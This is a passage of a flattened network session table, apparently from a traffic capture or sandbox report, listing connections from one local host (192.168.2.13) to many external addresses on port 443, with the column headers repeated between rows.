                                                10633192.168.2.1335514163.60.76.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10634192.168.2.1345702129.208.119.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10635192.168.2.134848687.242.55.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10636192.168.2.1349778193.134.74.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10637192.168.2.1338494176.42.91.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10638192.168.2.135891666.153.45.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10639192.168.2.1353966194.233.32.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10640192.168.2.1360274178.36.209.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10641192.168.2.134845212.136.82.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10642192.168.2.1359420155.11.202.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10643192.168.2.1350120167.9.119.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10644192.168.2.133335250.251.17.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10645192.168.2.1339884219.162.8.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10646192.168.2.133588062.57.139.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10647192.168.2.134111287.154.129.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10648192.168.2.1351820115.95.252.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10649192.168.2.1351606165.232.171.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10650192.168.2.1340526206.223.155.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10651192.168.2.1360224208.194.188.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10652192.168.2.1357216185.90.127.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10653192.168.2.134930457.12.217.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10654192.168.2.135799037.121.152.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10655192.168.2.1344594212.108.1.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10656192.168.2.135882085.171.128.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10657192.168.2.1354132151.56.13.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10658192.168.2.1333116186.79.67.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10659192.168.2.135939017.101.98.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10660192.168.2.1345798110.248.151.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10661192.168.2.135801618.225.91.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10662192.168.2.133776481.104.130.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10663192.168.2.133336225.251.84.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10664192.168.2.1335962208.224.221.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10665192.168.2.133428652.191.158.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10666192.168.2.1342548126.103.42.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10667192.168.2.134278275.104.173.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10668192.168.2.133748836.69.127.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10669192.168.2.1343732121.51.192.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10670192.168.2.1348706155.138.109.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10671192.168.2.135133220.177.39.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10672192.168.2.1354226144.33.212.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10673192.168.2.1357290206.134.125.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10674192.168.2.134005438.211.163.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10675192.168.2.1359088157.255.45.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10676192.168.2.135144042.47.181.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10677192.168.2.1346702203.125.23.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10678192.168.2.134172423.55.125.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10679192.168.2.1346830189.142.97.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10680192.168.2.13602448.157.140.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10681192.168.2.1353136171.128.201.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10682192.168.2.1351526180.114.5.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10683192.168.2.134698236.171.121.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10684192.168.2.135493250.48.240.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10685192.168.2.133958094.0.250.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10686192.168.2.1352518207.75.255.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10687192.168.2.1351096165.11.211.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10688192.168.2.135199677.133.8.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10689192.168.2.135462834.83.58.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10690192.168.2.1360322157.18.19.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10691192.168.2.1335318150.96.146.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10692192.168.2.1341170209.159.112.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10693192.168.2.135522637.201.223.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10694192.168.2.1344790128.135.166.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10695192.168.2.1333778164.46.204.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10696192.168.2.1360018201.96.7.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10697192.168.2.13548441.224.171.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10698192.168.2.134245875.62.89.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10699192.168.2.1336484119.194.80.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10700192.168.2.1358326208.195.135.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10701192.168.2.134476640.142.84.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10702192.168.2.1355898112.167.223.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10703192.168.2.1360788197.240.212.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10704192.168.2.133427264.42.80.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10705192.168.2.134330077.44.209.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10706192.168.2.1338008208.57.34.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10707192.168.2.1357520211.108.149.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10708192.168.2.1360604143.162.48.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10709192.168.2.1355348119.55.163.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10710192.168.2.1356224170.50.253.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10711192.168.2.135988848.226.52.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10712192.168.2.133388820.58.26.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10713192.168.2.135493281.76.124.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10714192.168.2.1340724174.113.209.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10715192.168.2.134587847.182.52.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10716192.168.2.1342384184.133.134.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10717192.168.2.1353834112.33.116.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10718192.168.2.1334310170.26.242.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10719192.168.2.135345248.4.108.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10720192.168.2.1346938115.207.71.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10721192.168.2.1335350119.105.209.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10722192.168.2.134279266.88.60.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10723192.168.2.135625013.187.2.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10724192.168.2.1347816175.236.34.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10725192.168.2.135834624.42.236.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10726192.168.2.1342388113.146.0.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10727192.168.2.134063887.212.249.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10728192.168.2.1338434118.57.138.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10729192.168.2.135516693.97.35.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10730192.168.2.1351480170.113.154.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10731192.168.2.1346504174.53.71.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10732192.168.2.1339468137.155.48.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10733192.168.2.1353012182.8.5.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10734192.168.2.133361697.216.108.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10735192.168.2.134452044.219.226.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10736192.168.2.133985457.67.114.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10737192.168.2.1339352200.236.61.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10738192.168.2.134674837.176.113.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10739192.168.2.134020467.46.39.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10740192.168.2.134505697.123.74.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10741192.168.2.1347588206.155.7.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10742192.168.2.133970834.49.108.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10743192.168.2.134151486.3.50.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10744192.168.2.134769631.239.113.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10745192.168.2.1344084114.69.215.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10746192.168.2.1356800176.103.53.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10747192.168.2.1350056133.28.98.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10748192.168.2.1351150210.124.240.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10749192.168.2.133868261.51.177.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10750192.168.2.134519268.177.147.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10751192.168.2.1339882218.163.73.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10752192.168.2.133955689.97.98.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10753192.168.2.1338704117.201.230.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10754192.168.2.1342624216.166.193.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10755192.168.2.13391865.67.12.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10756192.168.2.1340316175.98.249.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10757192.168.2.1356480133.100.29.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10758192.168.2.133663237.156.11.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10759192.168.2.1349672188.193.36.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10760192.168.2.1337140148.86.24.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10761192.168.2.1342140149.100.58.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10762192.168.2.136026289.122.250.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10763192.168.2.134514823.43.130.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10764192.168.2.1334752180.187.125.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10765192.168.2.135915889.61.150.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10766192.168.2.135285291.28.238.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10767192.168.2.1346048182.178.239.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10768192.168.2.1360170129.116.76.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10769192.168.2.136001651.213.93.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10770192.168.2.13337942.54.87.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10771192.168.2.1336750109.119.201.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10772192.168.2.1352164103.222.4.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10773192.168.2.1358332199.222.113.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10774192.168.2.134023894.139.44.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10775192.168.2.1355776157.129.44.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10776192.168.2.1355620169.170.226.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10777192.168.2.1360932101.225.158.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10778192.168.2.1334382165.247.22.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10779192.168.2.134252894.33.158.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10780192.168.2.135528298.14.130.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10781192.168.2.13522128.50.132.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10782192.168.2.1336706184.131.154.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10783192.168.2.1351298220.253.64.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10784192.168.2.135035223.41.142.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10785192.168.2.1354264140.198.135.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10786192.168.2.133690620.194.0.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10787192.168.2.1335408178.93.220.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10788192.168.2.1350906201.110.131.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10789192.168.2.1333036185.191.127.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10790192.168.2.1347390135.184.45.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10791192.168.2.1337370100.218.26.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10792192.168.2.1335360222.97.243.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10793192.168.2.136086886.165.193.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10794192.168.2.1340804156.236.180.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10795192.168.2.1334630188.175.4.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10796192.168.2.1353216197.34.16.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10797192.168.2.133344078.183.131.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10798192.168.2.1356000201.88.252.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10799192.168.2.134489034.220.38.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10800192.168.2.135778641.117.7.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10801192.168.2.1335094169.194.141.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10802192.168.2.1335106111.51.129.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10803192.168.2.134627488.46.1.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10804192.168.2.1344650161.140.202.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10805192.168.2.1347728193.159.117.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10806192.168.2.135654843.131.1.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10807192.168.2.1349082123.140.155.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10808192.168.2.135786418.53.206.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10809192.168.2.1352908130.11.170.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10810192.168.2.1352382210.31.32.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10811192.168.2.1356998170.57.159.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10812192.168.2.136070492.96.213.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10813192.168.2.133538842.75.197.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10814192.168.2.133562648.82.33.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10815192.168.2.135647076.27.37.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10816192.168.2.133918687.102.98.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10817192.168.2.134520461.106.64.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10818192.168.2.1357746141.60.34.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10819192.168.2.1353206212.41.78.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10820192.168.2.1333946221.15.245.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10821192.168.2.1360598149.114.116.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10822192.168.2.1335648205.128.6.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10823192.168.2.1339836175.0.58.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10824192.168.2.1360600199.220.52.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10825192.168.2.133791818.4.86.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10826192.168.2.135756417.205.140.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10827192.168.2.1335850160.129.228.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10828192.168.2.1341212134.213.153.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10829192.168.2.135026039.70.97.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10830192.168.2.133888832.244.85.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10831192.168.2.1355608135.195.195.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10832192.168.2.1352972157.33.145.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10833192.168.2.134252214.233.225.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10834192.168.2.134423895.228.185.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10835192.168.2.1344896159.236.43.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10836192.168.2.1344028157.118.112.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10837192.168.2.1343862105.167.35.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10838192.168.2.1346630141.183.82.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10839192.168.2.1357408180.241.119.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10840192.168.2.135041477.191.71.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10841192.168.2.135390880.236.149.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10842192.168.2.134004047.130.26.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10843192.168.2.133481639.143.222.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10844192.168.2.1343544212.181.186.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10845192.168.2.135035017.70.151.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10846192.168.2.135848043.213.154.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10847192.168.2.13470348.184.174.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10848192.168.2.1339346123.170.124.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10849192.168.2.1338796198.151.239.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10850192.168.2.1354994115.58.51.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10851192.168.2.1352500218.239.73.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10852192.168.2.135930494.237.168.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10853192.168.2.1340180207.193.163.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10854192.168.2.1342526133.6.42.113443
                                                TimestampBytes transferredDirectionData


